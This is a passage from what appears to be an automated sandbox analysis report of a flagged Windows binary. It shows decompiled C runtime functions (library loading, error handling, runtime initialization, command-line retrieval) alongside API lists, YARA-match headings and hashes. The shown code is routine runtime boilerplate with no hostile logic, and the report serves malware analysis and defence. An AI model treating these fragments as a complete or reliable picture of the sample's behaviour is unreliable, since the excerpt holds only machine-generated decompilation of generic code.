            • __alloca_probe_16.LIBCMT ref: 0040633D
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
            • __freea.LIBCMT ref: 004063A9
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 313313983-0
            • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
            • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E00405751(signed int _a4) {
            				signed int _t9;
            				void* _t13;
            				signed int _t15;
            				WCHAR* _t22;
            				signed int _t24;
            				signed int* _t25;
            				void* _t27;
            
            				_t9 = _a4;
            				_t25 = 0x412fc8 + _t9 * 4;
            				_t24 =  *_t25;
            				if(_t24 == 0) {
            					_t22 =  *(0x40cd48 + _t9 * 4);
            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
            					if(_t27 != 0) {
            						L8:
            						 *_t25 = _t27;
            						if( *_t25 != 0) {
            							FreeLibrary(_t27);
            						}
            						_t13 = _t27;
            						L11:
            						return _t13;
            					}
            					_t15 = GetLastError();
            					if(_t15 != 0x57) {
            						_t27 = 0;
            					} else {
            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
            						_t27 = _t15;
            					}
            					if(_t27 != 0) {
            						goto L8;
            					} else {
            						 *_t25 = _t15 | 0xffffffff;
            						_t13 = 0;
            						goto L11;
            					}
            				}
            				_t4 = _t24 + 1; // 0x9c4b7b96
            				asm("sbb eax, eax");
            				return  ~_t4 & _t24;
            			}

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
            • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
            • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			E00404320(void* __ebx, void* __ecx, void* __edx) {
            				void* __edi;
            				void* __esi;
            				intOrPtr _t2;
            				void* _t3;
            				void* _t4;
            				intOrPtr _t9;
            				void* _t11;
            				void* _t20;
            				void* _t21;
            				void* _t23;
            				void* _t25;
            				void* _t27;
            				void* _t29;
            				void* _t31;
            				void* _t32;
            				long _t36;
            				long _t37;
            				void* _t40;
            
            				_t29 = __edx;
            				_t23 = __ecx;
            				_t20 = __ebx;
            				_t36 = GetLastError();
            				_t2 =  *0x412064; // 0xffffffff
            				_t42 = _t2 - 0xffffffff;
            				if(_t2 == 0xffffffff) {
            					L2:
            					_t3 = E00403ECE(_t23, 1, 0x364);
            					_t31 = _t3;
            					_pop(_t25);
            					if(_t31 != 0) {
            						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
            						__eflags = _t4;
            						if(_t4 != 0) {
            							E00404192(_t25, _t31, 0x4132a4);
            							E00403E03(0);
            							_t40 = _t40 + 0xc;
            							__eflags = _t31;
            							if(_t31 == 0) {
            								goto L9;
            							} else {
            								goto L8;
            							}
            						} else {
            							_push(_t31);
            							goto L4;
            						}
            					} else {
            						_push(_t3);
            						L4:
            						E00403E03();
            						_pop(_t25);
            						L9:
            						SetLastError(_t36);
            						E00403E8B(_t20, _t29, _t31, _t36);
            						asm("int3");
            						_push(_t20);
            						_push(_t36);
            						_push(_t31);
            						_t37 = GetLastError();
            						_t21 = 0;
            						_t9 =  *0x412064; // 0xffffffff
            						_t45 = _t9 - 0xffffffff;
            						if(_t9 == 0xffffffff) {
            							L12:
            							_t32 = E00403ECE(_t25, 1, 0x364);
            							_pop(_t27);
            							if(_t32 != 0) {
            								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
            								__eflags = _t11;
            								if(_t11 != 0) {
            									E00404192(_t27, _t32, 0x4132a4);
            									E00403E03(_t21);
            									__eflags = _t32;
            									if(_t32 != 0) {
            										goto L19;
            									} else {
            										goto L18;
            									}
            								} else {
            									_push(_t32);
            									goto L14;
            								}
            							} else {
            								_push(_t21);
            								L14:
            								E00403E03();
            								L18:
            								SetLastError(_t37);
            							}
            						} else {
            							_t32 = E00405878(_t25, _t45, _t9);
            							if(_t32 != 0) {
            								L19:
            								SetLastError(_t37);
            								_t21 = _t32;
            							} else {
            								goto L12;
            							}
            						}
            						return _t21;
            					}
            				} else {
            					_t31 = E00405878(_t23, _t42, _t2);
            					if(_t31 != 0) {
            						L8:
            						SetLastError(_t36);
            						return _t31;
            					} else {
            						goto L2;
            					}
            				}
            			}

            APIs
            • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
            • _abort.LIBCMT ref: 0040439E
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
            • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
            • Opcode Fuzzy Hash: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
            • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004025BA() {
            				void* _t4;
            				void* _t8;
            
            				E00402AE5();
            				E00402A79();
            				if(E004027D9() != 0) {
            					_t4 = E0040278B(_t8, __eflags);
            					__eflags = _t4;
            					if(_t4 != 0) {
            						return 1;
            					} else {
            						E00402815();
            						goto L1;
            					}
            				} else {
            					L1:
            					return 0;
            				}
            			}

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
              • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
            • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405575() {
            
            				 *0x412e78 = GetCommandLineA();
            				 *0x412e7c = GetCommandLineW();
            				return 1;
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CommandLine
            • String ID: 5k
            • API String ID: 3253501508-3210601876
            • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
            • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
            Uniqueness

            Uniqueness Score: -1.00%